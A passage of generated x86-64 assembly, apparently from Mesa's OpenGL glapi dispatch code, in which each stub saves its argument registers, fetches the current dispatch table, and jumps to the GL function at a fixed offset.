movq 4432(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4432(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4432(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UniformMatrix4fvARB), .-GL_PREFIX(UniformMatrix4fvARB)
.p2align 4,,15
.globl GL_PREFIX(UseProgramObjectARB)
.type GL_PREFIX(UseProgramObjectARB), @function
GL_PREFIX(UseProgramObjectARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4440(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4440(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4440(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4440(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UseProgramObjectARB), .-GL_PREFIX(UseProgramObjectARB)
.p2align 4,,15
.globl GL_PREFIX(ValidateProgramARB)
.type GL_PREFIX(ValidateProgramARB), @function
GL_PREFIX(ValidateProgramARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4448(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4448(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4448(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4448(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ValidateProgramARB), .-GL_PREFIX(ValidateProgramARB)
.p2align 4,,15
.globl GL_PREFIX(BindAttribLocationARB)
.type GL_PREFIX(BindAttribLocationARB), @function
GL_PREFIX(BindAttribLocationARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4456(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4456(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4456(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4456(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BindAttribLocationARB), .-GL_PREFIX(BindAttribLocationARB)
.p2align 4,,15
.globl GL_PREFIX(GetActiveAttribARB)
.type GL_PREFIX(GetActiveAttribARB), @function
GL_PREFIX(GetActiveAttribARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4464(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4464(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4464(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4464(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetActiveAttribARB), .-GL_PREFIX(GetActiveAttribARB)
.p2align 4,,15
.globl GL_PREFIX(GetAttribLocationARB)
.type GL_PREFIX(GetAttribLocationARB), @function
GL_PREFIX(GetAttribLocationARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4472(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4472(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4472(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4472(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetAttribLocationARB), .-GL_PREFIX(GetAttribLocationARB)
.p2align 4,,15
.globl GL_PREFIX(DrawBuffersARB)
.type GL_PREFIX(DrawBuffersARB), @function
GL_PREFIX(DrawBuffersARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4480(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4480(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4480(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4480(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DrawBuffersARB), .-GL_PREFIX(DrawBuffersARB)
.p2align 4,,15
.globl GL_PREFIX(PolygonOffsetEXT)
.type GL_PREFIX(PolygonOffsetEXT), @function
GL_PREFIX(PolygonOffsetEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4488(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 4488(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4488(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 4488(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PolygonOffsetEXT), .-GL_PREFIX(PolygonOffsetEXT)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_562)
.type GL_PREFIX(_dispatch_stub_562), @function
HIDDEN(GL_PREFIX(_dispatch_stub_562))
GL_PREFIX(_dispatch_stub_562):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4496(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4496(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4496(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4496(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_562), .-GL_PREFIX(_dispatch_stub_562)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_563)
.type GL_PREFIX(_dispatch_stub_563), @function
HIDDEN(GL_PREFIX(_dispatch_stub_563))
GL_PREFIX(_dispatch_stub_563):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4504(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4504(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4504(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4504(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_563), .-GL_PREFIX(_dispatch_stub_563)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_564)
.type GL_PREFIX(_dispatch_stub_564), @function
HIDDEN(GL_PREFIX(_dispatch_stub_564))
GL_PREFIX(_dispatch_stub_564):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4512(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 4512(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4512(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 4512(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_564), .-GL_PREFIX(_dispatch_stub_564)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_565)
.type GL_PREFIX(_dispatch_stub_565), @function
HIDDEN(GL_PREFIX(_dispatch_stub_565))
GL_PREFIX(_dispatch_stub_565):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4520(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4520(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4520(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4520(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_565), .-GL_PREFIX(_dispatch_stub_565)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_566)
.type GL_PREFIX(_dispatch_stub_566), @function
HIDDEN(GL_PREFIX(_dispatch_stub_566))
GL_PREFIX(_dispatch_stub_566):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4528(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4528(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4528(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4528(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_566), .-GL_PREFIX(_dispatch_stub_566)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_567)
.type GL_PREFIX(_dispatch_stub_567), @function
HIDDEN(GL_PREFIX(_dispatch_stub_567))
GL_PREFIX(_dispatch_stub_567):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4536(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4536(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4536(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4536(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_567), .-GL_PREFIX(_dispatch_stub_567)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_568)
.type GL_PREFIX(_dispatch_stub_568), @function
HIDDEN(GL_PREFIX(_dispatch_stub_568))
GL_PREFIX(_dispatch_stub_568):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4544(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4544(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4544(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4544(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_568), .-GL_PREFIX(_dispatch_stub_568)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_569)
.type GL_PREFIX(_dispatch_stub_569), @function
HIDDEN(GL_PREFIX(_dispatch_stub_569))
GL_PREFIX(_dispatch_stub_569):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4552(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4552(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4552(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4552(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_569), .-GL_PREFIX(_dispatch_stub_569)
.p2align 4,,15
.globl GL_PREFIX(ColorPointerEXT)
.type GL_PREFIX(ColorPointerEXT), @function
GL_PREFIX(ColorPointerEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4560(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4560(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4560(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4560(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ColorPointerEXT), .-GL_PREFIX(ColorPointerEXT)
.p2align 4,,15
.globl GL_PREFIX(EdgeFlagPointerEXT)
.type GL_PREFIX(EdgeFlagPointerEXT), @function
GL_PREFIX(EdgeFlagPointerEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4568(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4568(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4568(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4568(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EdgeFlagPointerEXT), .-GL_PREFIX(EdgeFlagPointerEXT)
.p2align 4,,15
.globl GL_PREFIX(IndexPointerEXT)
.type GL_PREFIX(IndexPointerEXT), @function
GL_PREFIX(IndexPointerEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4576(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4576(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4576(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4576(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IndexPointerEXT), .-GL_PREFIX(IndexPointerEXT)
.p2align 4,,15
.globl GL_PREFIX(NormalPointerEXT)
.type GL_PREFIX(NormalPointerEXT), @function
GL_PREFIX(NormalPointerEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4584(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4584(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4584(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4584(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(NormalPointerEXT), .-GL_PREFIX(NormalPointerEXT)
.p2align 4,,15
.globl GL_PREFIX(TexCoordPointerEXT)
.type GL_PREFIX(TexCoordPointerEXT), @function
GL_PREFIX(TexCoordPointerEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4592(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4592(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4592(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4592(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoordPointerEXT), .-GL_PREFIX(TexCoordPointerEXT)
.p2align 4,,15
.globl GL_PREFIX(VertexPointerEXT)
.type GL_PREFIX(VertexPointerEXT), @function
GL_PREFIX(VertexPointerEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4600(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4600(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4600(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4600(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexPointerEXT), .-GL_PREFIX(VertexPointerEXT)
.p2align 4,,15
.globl GL_PREFIX(PointParameterfEXT)
.type GL_PREFIX(PointParameterfEXT), @function
GL_PREFIX(PointParameterfEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4608(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 4608(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4608(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 4608(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PointParameterfEXT), .-GL_PREFIX(PointParameterfEXT)
.p2align 4,,15
.globl GL_PREFIX(PointParameterfvEXT)
.type GL_PREFIX(PointParameterfvEXT), @function
GL_PREFIX(PointParameterfvEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4616(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4616(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4616(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4616(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PointParameterfvEXT), .-GL_PREFIX(PointParameterfvEXT)
.p2align 4,,15
.globl GL_PREFIX(LockArraysEXT)
.type GL_PREFIX(LockArraysEXT), @function
GL_PREFIX(LockArraysEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4624(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4624(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4624(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4624(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LockArraysEXT), .-GL_PREFIX(LockArraysEXT)
.p2align 4,,15
.globl GL_PREFIX(UnlockArraysEXT)
.type GL_PREFIX(UnlockArraysEXT), @function
GL_PREFIX(UnlockArraysEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4632(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 4632(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4632(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 4632(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UnlockArraysEXT), .-GL_PREFIX(UnlockArraysEXT)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_580)
.type GL_PREFIX(_dispatch_stub_580), @function
HIDDEN(GL_PREFIX(_dispatch_stub_580))
GL_PREFIX(_dispatch_stub_580):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4640(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4640(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4640(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4640(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_580), .-GL_PREFIX(_dispatch_stub_580)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_581)
.type GL_PREFIX(_dispatch_stub_581), @function
HIDDEN(GL_PREFIX(_dispatch_stub_581))
GL_PREFIX(_dispatch_stub_581):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4648(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4648(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4648(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4648(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_581), .-GL_PREFIX(_dispatch_stub_581)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3bEXT)
.type GL_PREFIX(SecondaryColor3bEXT), @function
GL_PREFIX(SecondaryColor3bEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4656(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4656(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4656(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4656(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3bEXT), .-GL_PREFIX(SecondaryColor3bEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3bvEXT)
.type GL_PREFIX(SecondaryColor3bvEXT), @function
GL_PREFIX(SecondaryColor3bvEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4664(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4664(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4664(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4664(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3bvEXT), .-GL_PREFIX(SecondaryColor3bvEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3dEXT)
.type GL_PREFIX(SecondaryColor3dEXT), @function
GL_PREFIX(SecondaryColor3dEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4672(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 4672(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4672(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 4672(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3dEXT), .-GL_PREFIX(SecondaryColor3dEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3dvEXT)
.type GL_PREFIX(SecondaryColor3dvEXT), @function
GL_PREFIX(SecondaryColor3dvEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4680(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4680(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4680(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4680(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3dvEXT), .-GL_PREFIX(SecondaryColor3dvEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3fEXT)
.type GL_PREFIX(SecondaryColor3fEXT), @function
GL_PREFIX(SecondaryColor3fEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4688(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
